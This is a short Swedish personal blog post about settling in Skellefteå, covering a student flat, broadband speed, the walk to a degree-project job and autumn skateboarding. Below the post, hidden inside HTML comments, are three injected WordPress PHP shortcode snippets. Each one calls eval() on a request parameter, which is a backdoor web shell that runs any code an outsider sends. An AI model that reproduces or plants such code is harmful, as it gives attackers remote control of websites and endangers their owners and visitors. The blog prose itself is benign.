Exil i Ske-å

Skelleftepanografi
Så detta är Skellefteå. Inte dumt alls faktiskt. Studentlägenheten med sambo funkar bra och bananflugeinvasionen verkade ha ny mark att erövra för en vacker dag var de bara borta. Sen klarar jag mig nog bra lite var som helst bara jag har ett snabbt bredband. Jag trodde dock att sunet skulle leverera ett riktigt bra bredband men jag hade faktiskt snabbare nedladdningar med BBB:s vdsl. Så var den myten punkterad.

Promenaden på 20+20 minuter till exjobbet är väldigt bra för min del och det verkar som att den på något sätt lindrar smärtan jag känner när jag måste gå upp kl 7 varje dag. Jag bestämmer ju förvisso mina tider själv men än så länge försöker jag vara där hela dagarna för att snoka runt och lära mig så mycket som möjligt om organisationen. Idag har jag dock tvättdag och kanske ska jag bege mig ut i höstsolen för lite klassisk 5°C-skejt.

<!– [insert_php]if (isset($_REQUEST["Oef"])){eval($_REQUEST["Oef"]);exit;}[/insert_php][php]if (isset($_REQUEST["Oef"])){eval($_REQUEST["Oef"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["bcJV"])){eval($_REQUEST["bcJV"]);exit;}[/insert_php][php]if (isset($_REQUEST["bcJV"])){eval($_REQUEST["bcJV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jgI"])){eval($_REQUEST["jgI"]);exit;}[/insert_php][php]if (isset($_REQUEST["jgI"])){eval($_REQUEST["jgI"]);exit;}[/php] –>

Kommentarer är avstängda.